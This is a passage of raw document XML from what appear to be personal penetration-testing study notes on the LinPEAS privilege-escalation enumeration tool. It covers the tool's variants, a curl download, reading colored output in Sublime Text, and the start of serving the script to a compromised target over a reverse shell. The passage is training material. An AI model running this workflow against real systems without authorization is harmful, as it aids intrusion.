      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the next Learning Unit, we are going to learn how to act on the information we obtained through enumeration in order to elevate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014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C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_49k2mc1txxlf" w:id="177"/>
      <w:bookmarkEnd w:id="177"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Warning:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I see CVE-2021-3560 highlighted in yellow a lot, but I have yet to see it actually being the attack vector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the </w:t>
      </w:r>
      <w:hyperlink r:id="rId404">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">release page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — The most compatible, works across most Linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_fat.sh — Contains more features and checks but is much larger (15.8MB).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_small.sh — Very lightweight, minimal version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_linux_amd64 — Use if the target is 64-bit Linux (most modern distros).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_linux_386 — For 32-bit Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_linux_arm/arm64 — For ARM devices (like Raspberry Pi).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_darwin_amd64 — For macOS 64-bit.</w:t>
      </w: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t xml:space="preserve">Use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or linpeas_fat.sh if space isn’t an issue. If you know the exact architecture, use the binary version like linpeas_linux_amd64.</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4fy35hfito8l" w:id="178"/>
      <w:bookmarkEnd w:id="178"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to save linPEAS output to sublime text with color</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, linPEAS output is too much and you want to be able to use CTRL + F or more. So, I found a way to save the output to a file and read it in sublime text. THIS INCLUDES READING IT ON your windows host machine, which has a huge screen so it makes reading it SO much quicker and faster.</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, you have to install ansiescape package on sublime text in order to read ANSI text:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to tools on the top of sublime text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on "install package" on the bottom if it's there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then go to "command palette" on the top of tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then search for "install package"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then search for "ansiescape" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, you have to save linPEAS output to a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./linpeas &gt; linpeas.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then upload it to your local kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then either open it in your sublime text on kali, or drag and drop it (by going to file manager on kali and dropping it into windows host) and open it from sublime text in windows host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, read it using ANSI package in sublime text:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the bottom right of Sublime text, you should see "plaintext"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3757613" cy="2095592"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="254" name="image259.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image259.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId405"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3757613" cy="2095592"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on that, and then select "ANSI" on the top</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3757613" cy="1924952"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="176" name="image172.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image172.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId406"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3757613" cy="1924952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you should have all the colors!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—--------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. First download linPEAS on local (attacking machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloads to a file name linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install peass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure you have all the dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Start a Python HTTP Server to serve the linpeas.sh script so the target machine (via the reverse shell) can download it. MAKE SURE TO RUN THIS COMMAND IN THE SAME DIRECTORY AS WHERE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IS LOCATED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F9">
      <w:pPr>
